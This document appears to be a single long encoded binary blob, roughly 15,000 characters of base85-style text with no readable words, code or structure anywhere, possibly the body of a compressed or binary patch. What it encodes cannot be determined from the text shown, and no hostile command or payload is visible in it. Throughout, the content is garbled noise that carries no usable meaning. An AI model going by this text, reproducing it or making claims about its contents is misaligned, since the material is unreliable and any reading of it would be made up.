z=0{rVL_f_GSnvxaoz#GL+u^Es<;8y6IObQdC&jEQ@FAuf{ARQ1kWPrJt#G`jx#LNH z!4+&0a9)%`z^owJHby>_1>a=67*EK=WeC_xX0{TU^T~M0Ocn1z^OFek0;)~sRmN85 zZ>7!ha$6-?;$ogw+ag=p%eD+Sx>%R{tR>ik)%x1frZqx^OZ%I_@2H`}CVAza+1)b6cb*^ zm(J0=;jFFWv45P`Z@3}VzxN5=oy?xcuvkZ%fkhd+H=^TzHKZKX$LUYEO|ag_c+Ea$ zDxSBFc0a?|7j@;wV6c72kHaQdZCMx(gU(qBlBf(cJL$N{vGryTO7EFx5FP?Pjaf=r z`S&BU=TTH+sQ8uY?uIbxQ7#vM!-MEMXSZjo)&HYfiQfT^p^lZD+3FW@RG#y)44Jkv zV?Q1jhutjgBdZ6EpL8*ws1XcLq5_I*oy>D|4uvN}1J^BvbNMKT`^^{5tyLBGs(a2f z4k$a-)95E_S4Mf&%Psh1zT1rr++E5?ZEU1o^%hE(b3@0`pqx8*G~sN^!UGhWCvdY; zouWqx7l56w6s!vDByit_yVhYb{2j;Y@DQAN8zsVWyXWKFdQP2=;mu%APrqArjU#CJ z?vF8xjqBQcZ<|r$GT*?uI2zgxR@e#;M)g+pE~;~|I%d1Yo{E|~HuHMGcrxT|9ZQQu%yv3e};tWK}~ISZ)1>=Yq_aR8qm<8yCirmVad9;#Ks z_pIRF4E9HH!jH6Xpp*3&O)img0*Hk6r4m~ndAY%uB_u$){^Y5 z80}{HQN^m>9rt=<%v%zQ)q@YBQE=n4#lFVSL*;CNww^%02iCTgD?}*ou`ustd8{l8 zU=FxynhxU$XJrl3@`Cd`o(mpx2d-5t7Q!bfRBqM-Im8X`MHDxzzHgKo%d4#F)a~^6 zx)oPxASLYV_{P4y+P`7SIE3g+mHl}(I=pH|bR*@oJx~36CGk(E5qoM$FNBA9tmMfMFCQExpVBWp2#y^bA+?FRDr3jT zA2nZy-NBAzJ8tktPg%CK21CG9CW}5!#@R0nt93cz&fnc+6S_;TN%uWGOREdFgZeMJ ztD({A?-ee&+9qEO|CfnDl6Pm?{-rH8=vFh;`MuqYPh0{SY4&^RSjkwlT$p5Nduyh# zDgAb{4kiXQ0 zi+07fGv)nqHmmRF>|iFkJ(IIT1Ty6%}W75 zxo%@RINM{FJ!z^)wq*KQj&gbLEID(|0LJ=cuXnx2=L@E0Q(ob4yx*Uk(fj?RyX!Qo zpqPh_R;${$gI+XE4UG+huNqpYetpi)=ZRDt#ODGap}H_vkjr_Ke`AW`=NkRsc+`HV z@ADzWt{Z^*MaFmN;zxC#izuR`q0xUSDC%IlzuMcI}J+o<6;w; z{!pqddX>2q->)o3`QBpoGu2ALH^I~@VZT3Ar2Qp-=v)Z=n;QMbO3H5xuZOo$e`wQ? z@uur<;_N0T<*V_=8pAiO_H=cngV`RST{ ze3$3MAy|g@u@t$w_O3Kx!l@Y$fJrz4c;QhQu>}&oM}bl8E2_}wO#3(=;7{qJy6LW} zvl#>Tbv{@VRq%pQS>X^TUCQ`A%!nZlFZ?(o#&#;>U}#4WJ-%2(xs;mrXV$Sbrtlc* z)akW{2xT%{FKY=IiqMu z(+o}k$4Y~Z={G~U9e>lR5NYF|pR@3cP- zm@KW*^%}Sc6Rxy)pMc zgwzY3)THB#h`MzUib1A_ps1Z4shY{LUd`l~s3%8)(~f6IYH<^!SSn^auK-o!8KO>6 zmEF(gPbmJ<770jJ?XTyxzI`kF`Fs#(_!N3fxo**Ql95&;V&yqpvK*%gTd z$4|_;6mLmYadLe5Yj`PCP)rSA#64IU~Dsm~y1D_?r6*{Kt?*;fySN4&F zm6nvpHZL4DD8$;~!4@`7_B%*%m9df_6|Mk{inIf<2`#=tSmv9u`tmAXc#f+#y0a7f zL`ty}sk!U3R0T%1XogG&H<8MexADR=ReQSjkJ@ujKL*AV(UG5X=5DVayV$;4uBWxi zLL_XfiMA5o{*{G&iI3{>>4kaH(Q-r?)m~8XC)C83iYzZn~{n(&DfeMSJo8Vyj@Q4Z8pF#b zdIw&NK%tHW=3b4N=IhDKGi?pw|KK;0e;V8*uQ za*FJmgWv5GORNKtGJd4~ITZ7dc$b`4n8AEZhJLe!8S0va`i6>Q2k}-o7IK_Mm<~gO zSppa?%O!6rQg*fR9E_uXh8A*j`@wE=d&(`g+xE1|zN%Mu6-?Nsi{-2=7}h1JY?4dW z^f=X~ID@!|%F4O48F3R#;(5pJ!DTa@6w=d#Ou=@UDC|=GVGOWsX3pENZOcJ=b-3=; z;r)8GBV3AJr7j$u?I@Tss8+By9)WkbxomL;oM^IA0PW$bKMp~EWF5GGKL#DJ-r`d< zbBeZQ-C$RUPH4!PrLn@bP>cD1sZyvrh(M&JFQ=DR8rVbWX%g9a zzilaFo}u4;aTl#qGx1g#bWhhEWIKa$cS+`vk{nN|Y~G`YT88KG6`@m{VTTt%iY_q)-m`eWqRiNGDkAntRSxg?HML~x zPH5vbaU1*X{Z{pu0~Z&E{(94pciuJ&04fzbd^;}X1C&BFkjO-Lhz6c&c_Qsnx05RK zhVIYzqy7}EEW)V4x>W7_bP4VBjP129pRAd+YsgB+U}vHos)OK5aKesi+>x-J@q%lJ z9j^bqoYVi8a$eMTJU^O-aTvetpUN-#Spm*tsZ1v4R5IB2+~8=B7qlCkfP3HYCrHzs z@HLjzIHtqK+hk98o%y{>qL^2sm`gckA#-znt0{@{nkF>}y18d4ZVtve=-j}}3*I(U zsVrYh`Kgxnf}a}EHOz#?#?cL35WjTdkInS5$un)=6Y(2vA0~eRQ%}A(4EP@SJLwVMeFP>%1n3D}f~&T>9U! zWZ98blULqDVk@dEn7vzK-c?jW*7}Wa@aE3tbBx$Fh5-syHQ@@IyuQ|^db|2~JYCRh z3NQ0k^@_KWAxcMAdXy^`_opi((!w+~nQ7Zm*8i9_N|#$q1&K#lF7cYumhbuLaAhjE zZ=0qD({+5$=4oupWnF_@))B*1Oz~x1*<94pS1vZWTU!+Q_SU8(!YdM2Ofv0`h_x@-IwuNRu?r|MOZHN9xc*K03|&=`i@O=7ScC}gow1X*QGuq2fu zpgUyRT+`e*$RJg1GFFwv&*bv`praw&?EU#Ztbe33KKijh@RgC?<)eK}t268JJ zNZ%{Y)xEtNWeT^`Jc zx1cK_qde&Z4(iTmZf`)39Dp8aU$(qXw~wC4QDbt_7~iH4I@-?>7r#-W&vJZT&PKgg z*3<6zInlHm(l}&s({9p6i=yd9XYRT2bhCK6S&?jFf8*%yjFV(8dF*ozd>H)0F{+H| z*fm$!u3i-S2Ada!k$795PV2YzDdPefr6ZW8ub-sp(+ARY3-9eRw0p9U(=838@i8So zwT6-ppx5yV1-% zlbZh)1e{Iac6ef@L08g?nV6|~Vy5)Gv}Inda5Xsy<*Ydxb%{?4|^lJqMz!OnKyzm}A`$uI>mSBo-5rc+$|EZE4RD7uL|V zCiu2BYHvas)TAjUCQZ7g$}r-ZW;6LL^qWmPFq{70h5`^>&QrHZ2THa1MBY{(i}cFWupfolB=+n8-Y!i)mCrkZ50=@6 z`--#;HGQx>imqkKKCUD=u_9*~+fDnK@C#~MYu{G1t-5x)MuRCE(f^_s)Bk}hroOTM zzpa=#i}Z>~azq#|MVSl(cDeE29k?{2@xh&UDdK(72J!gDF?|0KyKJ+=7Vh(;R71|% z<+`GpElRtvGOva%?Nco-gWVNgT;^}6tzvG#uR%A%YtXy{tC)xhUWQf7SL#4r2BT)P zdTM6pz-tF=#a?h0m@jwIDa+qj2TS!RQO$<$W^y%c6Af}!K%Yc*?r8NyHG!1PW0+T=)e<_s@$;?I~A?!Wjm@@B_x^amFVRRTW^H4+gH@s=eBH7*>ydeO(yb^?!L_A>3~ zROc`B)5YHPDL~^jn&Kv}C${fXiwes{52R_s;QgbCSTQW?oI`uJBAgTg<&4IDPct6- zM!&HKxF>Ik({Cg9?4%9juyp7|0W7I2CpX5Kny5cy-sDZ6D0E)r)XVryERZFBInRP> zzfl_23H=y~1l^td6vFvQ57%i`B|d{vEV_$zNt=fG!$fI!%0Ds2!&q^*so)n_wl?W- zU?{K*X!0DvEXA@MxT)wDC-HTeUyLQ3F$%uHN&7|7{%!CJl#H)#hWo>tn*C1PEo@+|X@uYGk5EU37Fn+!yoI^yw}@@Dk^V?pyCY>pRU1c4 zxl!84YCX&N%SgK}GzPS5ls{_HF#selG*iO3w|3o zXYH^N)8arqG0Ri+tX$4tj%Q`t>J(Vw0v;hqXi6>DGX=z9Ii7goEz}rQcH3Y27wlGc ziOO6{mpRTKCse4-q=U09e1?MgG*)~$ti(>MIQ-tQ)TWu%QOYvqOO)NHXzmOngs45~h=H%rGFT$Kmcac0ns zWlUVJyY!gH9=c@AB~|Bn)SzSW4seXaUW(24Sj80d0X_QT#H?a{ zN;X=H32};9!d`4r1gVc9m=EwYjBQsoF2qF`BK#q5E}d)B)JmH=CMwiY+`c3N zQFDZ=dyFc+nDQLOQ7NAowXW$&hfy&KEy9b)EhQX9PmqL<}p#00Ow-czk))YfN0kqR}W zTiWyK5nWBRzSCNs|4t;&SFdSIkY|?Xe-6Q{)Xle}li=iAW9qkV&17CxP39UJb^UxT zlCYgYXR{--8IHpSo6WA8&CA*GY}TmyPiYZTwmEOD3^syeOuER*dm%Wn6wS@{QgJR8gYKQF}>KMtCHqF`JWG5)W>I1Jm=B1hwfb)05p@SJD{%*a zz4%r71HZIGtlGVJFN5Ef(BzzsUNVa%2|3{k4nKI~NxD(ZB%Q1#XqiXYtI( z4^df>gFR#gDBs`m=I40GA>2xe$mf*(Kp1jrHI;G>yBdVLCA%IR z>Vz=&0QE{d`7Xl-BnRpW8N$#&7`kpF1fBoFakSWOyUiWT*wq(wYX~vFIZjYkZ_?v& ziIeY^u&leHtJ;xC|4|wDS-cUghySaN_;`f}W^XuM~qTKm%9G;`t%1;w$l5Px_707J`S7 zHhOi~mooEQoVKZr9vi>4+~JrM-n^IJHyO#dh)%z^h!d?gdBnL8P1~{N5hp*6IogeE zbZ)0;gWRZ(4m#E~i%KspcmS2`u=qhA%>Yqvxdo%adiL_d-;$hm;Mo|ad->6S5>{g0 zGMCf%pTz!5Ju7?-iQ2&xVqWJ( zZ+|d<__a$zx~(ClUIG(CQ?5&=ROSbDF_1sYV;2>3pN_eeV@{1@?qwcz4&IaM=i56| z=LN5WU;Q;B<5kCd#sV6zMnjyd*cH!aAFNPgXP>O~IlBTrecL23<5WB+yuwX@XuR)p z)!R0Q?MW`+H3r98JQ%~<(-LT5B`(KCO@k|wXxDJm>+TVahGt6VGE;gRh!srbl!wWNfqElu;r_4#{lsSvnDZ3TxW2oiSYK#@xX4#Q6uTB>K zy+xYps-YPbqLvm*=vp|a;V#=)HFp*1THd+B9czIO0iEzFmn{WwWe$f*a84+b9aeB% zR#ab!6u}!bwv&i<8r2_&&S#y7WxeY5M?_3U6!5WkL%wJQm|fjFIZ7>XAnd>~v2$FJZTS*f3+9-b35z`&7(X?dvXUyJpxFKb7Gg^*@yHyeoTs%6O30=V^6`_UlEoq60Sx`i)U= zBQqZhsiaJyzP!7mL`XEM`YBSn5#BX!V2-|TZQ?U_0yYaSThcgK@%Fz$6YiMOywucy z`)Z?EGa>p`ssHTpBh~(?{Y+kWj4!6mCa?AT@4xre`(6bv75Tg+D@aBq$$HHS zSLG2(%uC^uRyQhp8Y>8&^r-Q~$#wOHnzKjISf9>sD}*7(d4R%DJfE~PKe)*ewny+e zBl>(4pX=7etox{(li;KjtIezwGx0f3vF5f?Q+HLy9@vs@%bGcF8V>>38Bx#%NVLUi zzq=ac;T8cX?W%xij7m`@a;l95c8SBXq=nyM)kqcUl^}i=#NamwU#lL=nyeUl-}n*^v$% zHQi0@C9c{_Ts;Zz!D1tB*wR}H97@`9zvy(HBtkpBVsxGGGCt;{TTR+0m~wj*%CneF zx;%?l?Lv6RAgJP)<_-bC_aZV&XZRFU-$d(8Z$PPN14_pmkVhw@nN9Ya(4PTi-V2m@ znD5BdCiGXJr>jWx{e&h}asMl=c4Jx{VD`*5rr%(cgjUZsdR{j?o>Rtjw+0779prAb?Y~z|Z6g?4>Ko%MmK&Y2SH>;QJQtf!U-3i~y7}5Yw1RKza+ab?QU+kT-7ct?cky%tX39D}Q)xPck6a9$F55*&*UaW5dCt1tPUE$> zVE`%j&@#1RMFat{q>wJ9jao|X&!Qk&Yx-F>>q{d(b3Izi=TO^3p|Y!b*D-@DRA#;Y ze0jG2>1HXoNNG*?B$%^SDA{po|1}qYdf7vu+|POhExq}?F`CVvpGU3O<3z=Y`iUY z!+%0^%Y-51etc~f9>R1&15M$HbEQQ+K4unOM4oJYU>?Lcm2pJPKx`_*C7Jq6 zq{Gp>2NGOm$YAZnkeEFX8+WuP=#-=teJDq8`c48JKSVZ!_jru@@K4NpOil70*Dnq4 zArxpZIyulpeoQCTTdsaN2HM(}9Iv~2UDw;JebmqiHJP-iAK50>GSrU*YojZtPsa&g zmL=n0$-K-8nzCdZ$^b615~D#o*9yJ>u1IR+v+uVjq%=sx<*-puCWe{ z_xV^eB0ZdvhhB%g@|V~9S#NYfq}XSwe+Q|5j{3Kr`qv51tM-+6mu7|6Sn5H3eaiNOAunbRBj@6AYewXLq&OZ^htS1!lc2IROd%3)s#%hwIa*l1N748?v2 zf0M{x*@ghe+KJd}q_E-)dFocl%S$#p-{=Ix9A!gHS>b=T4wz(TrU?bnRmDSI-(?iG zRODj0U$Mf=se&Uqa&iR$W$i~IX53!s+fx5~+ATbNPrHS;)c3S})>!Sh|Mi|WS?-om zxm*5^YL}X*KP02Ju8G)byID8Of+kYoazwM$N8? z+9?^ec}>*RWYiWlQPYx9JJdw&n2cJtCThK8)cQ418ziH4t%=$#8MS*&)E>#GJ!_)& zN=EHn6SYq=YTufu{gP1!)I=SajM~2@DojRIYofZ7QFCgd<|d;Ks)_nzGV0)(sCmh# zLu#UW@U^Yk^DLI4C%?4eKZl=l%%HapM-%V(*t9hgm=u)s^=I?d_YaA(~t@-LPmpsXwfc0f+{4susnMDi zn*$AZfq~M3$my1)@-M*IB2#W+e@S#ItC(KN4Q#$#6mF~SgM3MJUiPK*7b1P|y9489 zo*Arz=9qJi#hWFUzlep}*bOelp0c(Zu4CcsRY|$QqXgk}@J+rhC9DidOENDl8B<(r zz1Nmbsgj@YO1L*ge_h1o-YO0aJvY3}KyL^2DPcIRwu~7J=a1%6LDd&;Jul{bZ%V$_ z`L8n{cd{X#9MRrJLUszi*LPqfAO4Z@r5!n;$!V-a%pmZK0Ds*K+XzS7@@BY#q1{!o zIavXiFtX$ZK2Ks**n#vTDm>>DFjzLq9Qm{yelzOTr6#Y zWQ*Kwpar-A24ceeH@JEmI!eAOel;&eALNU{LynvdXS&|`bST6;Ye>rs+Tw)BWZT5~ zZxWKW;pyVZ-|>sQ>f;o-Ft~_vAC4%FPcbw+AESy(F|kYUp0d}3g?X(bwI{Cqx&QMi zFjm^Vj8_aU-~m|xuR}0=Zw`cntuU=oXec+Q(&rC|W`RqJN_!7SmlgQvQbL(953mqr z^3csZJ|n1=NX$ov#y}}ANFEYkFmki?CC1p3{)WHhMPOA877F4P7*WPslf=WYL{Ke zmxA4>pG&vp7tv9LCjC^%eYT)Khhte1bQqx10G$pfRs-C$PlPW*D=6W|4%+Fbv<@z< zM+4vl6#zy_veGCk_}by`p0`cqoPz_}%X~{P4%xbAK;P*ttha8!d;3iBhvXRWGI%A{ zGqJ##@xhiLG>vuD&ri_Y__fpx;fr|eGM*g?sIax*D%jiXIFZsVGzLv#%dc3nG<#4c zt&tR+%Ad1v7Dj!-t*F2;pIC-5pN>H8|aXGd8?JzP5PqbzQm#{Ykitd*CgYRqKeY$|-ofI7FA3TL6{l&>mI zDYk_w=*xXMn7r*jV55sH!*|qK+p>PK#`5?L)kYAYkke3nLOrXIzw(N z>2cS#9W`)g4J;1^Y)b;+4`(iRkzm!75$Tt%uhy?fhqy2$3*xP%EX7$N{&p-QGu4dGe@cS5$@7t~j8TyiZ^QVTEE3t4+@smEls@~z$v zRUdsQOy2g`XV=u9PPhZUmq2gUADrHN<;1+e)>=jw{AO_Xegp~=iwJr@!FLb-R#!Vw zOVpvF6Vfuxm=e`ZHFA4D=A`&r46n9?{YI>u-#0OPfSXl0&0s5;^a3&mg6x4HXCSD4 zASg8ulo<%h4FnC1LEA_xB%)9#vRebRh7&>uHTw8Z^5auOju{{EG2^pj)W4G-KO{eX zOn!_78;^ag8GID`%LJSic7+iwAbDZ&Y2@;|Xenz z68u~6mLt69@q!-=?Edq_vi@kF{tk+gW>%+k?mu_`*984pArdv z61>Moc#i|#j}v&W(b)_;&W5nn=BXr90swIpK2MbJxm4lvnkxL7Nbsvv;rOTuC!h+S z57x9V64|~GykFGd{VkE;H^F;ig!d%i{bDe@?Xt!TWt8!S{mqlnC#s!25mz z??I9+d_Bq~!P?l@;@H>X*r-nLC5n7c>hxYso&J?b@Gq&;X;Ga{N1fgqtgT-rvVAFd zzpTN#D3M^1;5{S4dnWLHIT+r)M7BP`+gF44>qLUD1ut9XVZ5-$BkB9&eJ7Fa9l`rf z4c>1P3BDD)XGQfr8})rBfmisQEj7O*c5KIJTxMd9b9k9xh|PkQ!Q&HaV02oNMiu`w zQLj&>;-A)3{O3f1pQYmG#&iP}|8%ep`7n{~L&5uD4c;FT34Rc~e~R#)54;}^hWD*R zHc=c6-l|FPRU*MxlHjYFf`3mW_+1LVAS(Dm6#Ug-1;3rh_O{@Cy9Vz!i3HyW-iso< z7X$CxgW-KQk?mc<`)&>1?-B{V6TFv1crOLscN2IY(%I?~lK^2WAKYfJGt`J2*44~} zj}qm4Bo+CnrXoKk68tC?xh$&4LR93V!5U~MD#Bqauxkpo5(z9xfS-s2-4~M}4hHun z3Do^@EC+-8Yf670QRxSyRSzVyKNx4{VDMl~_J<7kQ%#-+?f!o9h5fQ-~yJrAwu%t9pYb*XBOw_-Vu_3 z={n!GHTi6}2Qky_Y2j?VaHjKED;zCfpw4B2MAE70d)#s zYJjN#mIhb~U~7P_0FDMY3gBvhs{oz`cnXlxfRqBHH6X1384buNKvn~?3Q(^B^$O6S z0SyX}Q@=xW#1I7-ssS9p`K68K+_fzC-3fQBjYjo!Oy-@jOn^omr;EXhI1d+t$5VWS z=-vy9=3{)EV#Y4;tm@f%DOlZKB1iabGQ+35lCX|Y?sdG5u8tN@_kB1u`6e$OMxITs z6)*O2S2QwXWxc>bF{Az*sL!yf7cH+XZzbwtckh!%W%f%O%GdpP%KKO7zQq^%d`Q9fQK!P=AVC^di$R{>D1$?^0gnWf;MX zTYdCIcyVf~<2#uY74uz+m9f!QH{3f7sr}?vsbb!wTMV7Ac=EsbhGO(`7lnJHdHQ?B zi;Ces+%>3l1B@Cw<$a;>c|Od~3HBy0&2FKJ9oe++h2O!6QF%>)HMgfFFubDzowZ^K}3w7n;)LR{4Of4iyOZgM=Q#5bn=!PpI6q zpO$DI?g>v5BcL#3fB_$V#?*oS7&3%`{z`O&;Spe9cLWGY@<+LL&mm@O`3>I3W5@Ba)MAl0NMvJ! zLf)|S$e)SY^i0&IXH#M}R>_>-ty{HVDw*?|=BnKi#+_Op{ocUu8^i@!+wztruE3T# zDH>i(o&`@u{$S6;7>nzv#=3A9_}psj{*X!>FW$z&_dsg|O?|3*iIrSU1UTWOet?q+ zz@EnyfPFx=)pME@3xn!;QK_&HiBzK%&c#eN(T8z_Q4gF~=@AdYyNmoi^swj(L+;-8Vg^ zVNq__s;%iUZ|>XYclj_nGG^W{-!yeqECdnTHIagy6%XHgb%m>}IwC#h-IXpJ+0|fb zP#26pb*4GVJ9~Go)^$RiE~D%3i2BOK_el@^xGT!q{M+THcTMLcNBr>Jc3tb3I<{+P z*fx5AQyb$pJOpJuJKn8!tzv3W*R?=+ktDfc-y^z8TvIfy>n=nc$x#pd;owWrz8{x8 z;!KpeLfsn2b$!NI`nKyjv+E=dBDU*#e>cLX|kc(-`&*qS zQdCNu%foKPcSpee0UXP~7bD<7 z0M;|`tq9l+;Ey(d-U1Cg0KoScxO@cM55Q*`xM>80h4Ici7`Q_OJOaSW85l;u;{iN{ zfrmxFvjLpPz*8gOLI8JV;EfURdH}az;7bwkE&wMp@Z$*h7=Ys$_)7%*JAgwO*l@B2 z_5t{d1>ooih`HDK5d&9?fN(g_`62^1j)1=dcnWJI z0PJPpyeQ>p0QY3z2@!BP0Jmh|nGtXq0M}&Tq=+kU zClXw>gamgZ!7&38WRU>&xWgNfVAmxi_!|E*l^?gVzhHB-#A@&UtB208mi#-7kki{pvm_1rY45{9v`a=ld94c`D4A!n}7$@!>yGc=^Jkx-ssArS@;s z_LJ0WLt}*lq+a()k)zWcje^FK&c+e7q$ZOznfb)h;?h4pFg_D8pn%DDx7|A)Bm zi*f7QPFZ5>^$=|?Lp0}p*fVic;gOU!oCl_EMD?#4g@6;s3zg7Jv2$Fh*lzLIUYqoC zuivei#u~<~bK-Hs!RuB&*Yh}F289puIH10C%58UPG+WF2sDXGO(FuG|WpE*UIPRk& zf9R%-QnN3af8acPy>I2XuDbJvoVvu$Q}b}9Q93ei51hZ=7R|$~*W6z3jp~9MX!e@g zXcU6S>VOfot1s`H;@UN&m0RKE>4?Z>@3-W#-6mVy;s(Fr)QJZekFxO*D1q(IN?_$7 z1SImD@tvKzQ6>!_w{<~ZCRL%aQ{!UAcsN-}H~;x1S3!?wt8wtf(tgM*Ap5+X+CP6H zPWFvPcnD5Qh3dMeX+??T1QHoXh4S2iIlP_HRh$94gh1dfa<_-*vj>Fg13ItafY1wR z1Z1Y6qCwsB2{OKV7!^?r599F36dpZPeOz!F{{CgcGnxa1Lq=-=}{3LRZ zQ6Dek<1qd>e4>(TtfqcD)$b(v4bH-K`?54Y(L4xc?ckg!bgsd2X9Y8zUgR=!cJFHZ z>-1`DleP4V1KXHAUG&@L1|wX)r0UYqT`K*W_`Q$LojX!r^{&a{nKf8^b2!T@R*z*n zNWt@7bVF=oEBd{Ybz#bZEZ?UwQ)f9e=K{c_3l_@L!LY(W_hh4Q8FXznTG-;na(H8B6^WPW^<*yE=eq|#XZ zM7@Xtq{}&rRbuHZ4ht_*C&&1k&9?dd?wxqvTfJLD`L+jt9TI}z$$8K(4*SEuKXkCw<5{yX07m06=X8;ilXE1`{Fu@o-MFWugV zu7dvd3^_W>^0%;P8$*nu|;x?!%qy0(*NveL2&r> ziHX9NVHP*!Qjf-l#$0eK9JMv5e!rMAVgCCKJonW@!ee7(ey*VU9IRqF{Qp0#U}G+5 zK@&;?CwjS1J?M-Yzb$%o=70z^zSK^X#j%J;l&sk52zVbD-n@r-IUXEvqi$~iAQ9@hgNN}XZ;SYvbGzHmgVDf&Tq6{9ssQ~!%?6_LoMc!v<*ul zLm|qh=rPQAWAnq|h1aP)`Y^U}faN$l94qOT<#gBM;-m^=7t0BF9D{EF_&|Wi3%HfR zHv!xY@bUr<7<@|vUO~Vm2HzHe%L1;bn%~i{=4}$)uA=Yi7rmlHuf$02i7LFZfG05c zzNo?-0-ge7DJy&^#hYiiwt&}3GjR!DU~nN^SHSBj@M8+RzJNDSNS;tgHsrFfhgV8w zxDjHrrf>xt^F{hbQG(!2$S6J~TF^>}HevWHYEUo^JB6Dv>^dMDZ-%QVWKhHjS7l_Y zLn>?1jPSFp;z?=4^Rr0?ZJzXB)oBJ_(r{^w$EMS**5{-Muq5 zdC#)LKk(6kZ|m^S#_AL6IDAl&gd~VY#AVD<``)(d zcRTgFz53lj{qCsu#T^x3wg$`=9V*9|s^n!_S4xo+Yhm|7l)Eig;c^7Gi-X&9@CpQX zU}_fd6aoS2<+_Otl;dl04^GFvpg)PSWYTqC8I>rLL;%|h0E60nRaCkf1grqv?K|<- z(7#sH@a|n?NicsqOVzKsO}lY`IsgB()01u3>B+8;Q(O&k-{FV}zNCuIpIMt`H>5e& zMjFK6@n|OaN;@>9lTbJl<&83fzc?~=#u!Qa`4Pw9BaUeb8}s@4k^PmbN8tg%^SfZ)*1J z%hE!8u>c8{Dv?X+-Xh3aCQ6-mpE&hf5kL$n6WhF>+UIPe*JinhpHw{MqLeW5TC6y~ z1|+&?aoMVHXah)z!GY-*d@h48?hn44!GG=###Oy=X$xQ}y(SJ9)K<7~(70I~cg3J_ zsWTCGRZW~Qdl_}es*E;Sn5Vl<$ARYv4&dbAecF~&7@?0))6ar-%e*(Nb_vv#Hm`;a@*pOqvjV_qf zzvm9)xZ4JeJC)<^7_`T4Ncw=w^GmckL%<`(3jdd{sAAn6b#9f7Zx};_{U)aNBzNp3q|7 zyiYK%2nM<>Ee9jE!pnX3;z?1Tal{m*bvZVnNLg69NvT~X`mi*BbSui7>{&*&l0tPH zH!|mP4?_z#(W1|iElTvT;=zwMS{BA**8>%e~I)e{ig2^Q(C zqvQnNV5{9uZ?)UutZq=J%b5#jDC66*)n#cgy6>WKJS6xDskR-xsQW&YXZGHYAFKBP z48R04_|IZ${Ge{=L)_4Z{;uAC-+0A6Mc}<^}xab@9UAYwam5lZaZQHVW2a1kp24&PcVDsym&j@6tJf%?-S; zf<_>6%dP1Udq^sLDJwQ)q)Hjz;hHq0OL2j?Efg8=2uYu85JhchD(f3r_9Vr|MrIL= zF=3#7K|kS6b{Sg#PorPht8Q`Pb<^ntzA&9>%|iO7h@WDq4L(w38{dLJD(g#9Pa~?XyzO<2Xee ztjd|E%IQ(%9HQ|5QSeJL*h?s@ui#0=)z8DK&omQ1&w{4jd3;=ZkV+E40@{219!Xzd;jcSjc|&PlKZvIpBO4yNM~ ziK}$I##E0wOJ6JZQ&kZv;m$$l@jIf4a&PO4Y48I3;hD#Bv!@^iv6=sIi!(E>z{95@ z+ImCT-u}v})*1S-&RjgxXd6-eTo-NyhdWw9ipw>vEBPtM$7sZNgXLXt_J7H1ho7kV zB3PhFBA`vIHgi}>YH0^&CxnM+Q2_@s!z1d_6H}KXlORQ1s9%9kvehQA2PR-Or2BviRs`=)v)Gr1Z_$9_ z;9PIHbF_0kD?AHq)6i-gfdqbs%u>P3{k(j?c2`D7!&IBaHDxXNx(7k@*_xEMo$VHK z7WMA9N3TGbm@CS+mt3i0A#TEl7Qa4L{lAu8aA4obU+gLbcc-V$lI8GB{y zzJIY~JX(|gNUX_g)mph;t(EK4TKSt=lYdof<{DWul02xBHFIsWCL`Q0Cvab;a9^%) zFI2d%P`IyDxGxplk~}a4_hk|8UFd9mD6hc+&9FHSQ!9J%orq{27||Q&cmxr>wGqt& zBj(3B9!13b+KA@b2%>bKW%Qot7({iAS6DZK7gzPG^R&KOn^i0mC3t|6#lJl==hA%*_{u0i+i)0Un9Q!rU858dLBtgdFpRAYWX7uP;C0yBYDpBwj)|<%Bnjir>Or&+EL;F;-RZO2p98A$vn3y6b^IqBr`d%X*U1 zE6$R%6C}F(A5Q!cSap2TDFpAxhFO#V4l(Bs!Fuey5a%hY_X1c4xY(MD9lNrOH5co* zZJ5Q!ptc4J7R^WG7g+_i$ENl=$dcb=|A=nzTvqfEajp0k8a>Q1+lljeA1?)Ie!dM+ zPscE)&6|HBb$+=npRwHV9fA(6vlK6R58-<&Zl@&;U3qBr&gE$%*yT^O5j@P6(SnzF zJAsY%_b4>fv?^KGQXN64vnp$Q+O;&S-n8@KSCrZ|!@dk(czpt*UhzCT{0M*)|D-Co ze?*i^bboyofMF_D8qA{A{W3%{ub_0EUzMC$u&wS_0R1N}A(*Z{M(yZJw4<=1YQjBH z6I2B!sEAMcwM|t!+pk^qDqC?@JK!@lyaAO?bM?~|FP)N><++{oqrN`kHia7`o76m5 zlZsxVNr}12dsAhY;@~oFVM3bruMgAW{duA^S8C38KtKOK^n>mJ&knu>H$yC>8uda^ z4Z2A~hyh*NPSOJ}-6P}710VNXJn$P~5f9dbQP;H$?7AUlvrT>X&qUvWCe5LKc$?`l zw?MCAk+Qakly$t6HD1b+qLiSuuSP{A+$1@Eg<%6KQE#?%zZ%s*Xk6ZCogB-~Mnz+p zmc?qe*Om0BMqI>X1sS%et{}d?aL;lI{l268AwzXtST-9&JNbMX!D;8~5wxxFH4JUe zu4Jpnp0A}SX3)Y?U&Pt7R?b!zMNx%}BEZr!!_;dED`mSg!`CT2&Pu9N-cNQ)^xk6^ zW9(77onjw)Pqsb#jPQsBs)OUKyikPD+n33tYO z*#{BBRod1}>=+hJOx`d{+YAQom$;}CPcRE{PT9YAp?bfIdfR-as;noDgslv_1!KWH zJc1E}&ps?TYocr3?ejhMK+zB@G89X8@O_#c23hR(hYwz*SYEu`WZDS1-|ASijnBSJ z{k2%-kt`n{x))@5a_|wX|A}mdg|nU&{K9eh@TY-5TY&m5Qtk#>s`R*)X2i>P+gPi5>xDJ!2wTofvaEDc`He{z^0_Nh zj$f9XL-ZII5u5%V-#Ko5QN*vaMMN{}&E@w^sY+g6ELG|~v!kx$@p{XOZ}X;7?>`tMg3q8|nhv}mbzCRBSF!M1i-^%5TktLy>Eo_&ebUq#MsF1l&vNIcansvgxu~oHY zTLYUI%kDR{SY`%Ru}92V_TeO8t|MD*kz+B&WcKz z97TU#`^mN6#I%Us;=52#ZJ;{P|7%9+K3Yu6){L@B`{GtiNRWKsI@attjP~fZM)Oeo zvf=G~u%5}*tpO=%xxyaQ-VdOs@utIiT;a=L3&Xdd#xSCK{KbQuujH8sqHCj-~{^rtB58rlJ`s3FieeErGaY(JM&shxeDQ^O`74+a-YG4Iv!VQWGM`=N@ zpF)uG%n&ni#Z65wwze~u4m&2lm8tjBK5?QyV_~oArz$J^DQQZ^&nRA{eHoRNApasr zxxrM4WccWWt}1p?-?+hQRo(p(;>`}eMDu2Jc3%Z+enn&4mMr$C@F7O~pLO^JW8C*T z?AOgZv5v!2t!m#T@zvxznACflJ?}U|6Xw5*i=12XcD2)v1c^WWfJQ@F@;1x9+=690K@Y?!g=~36v*#$51AfeMKqq`9 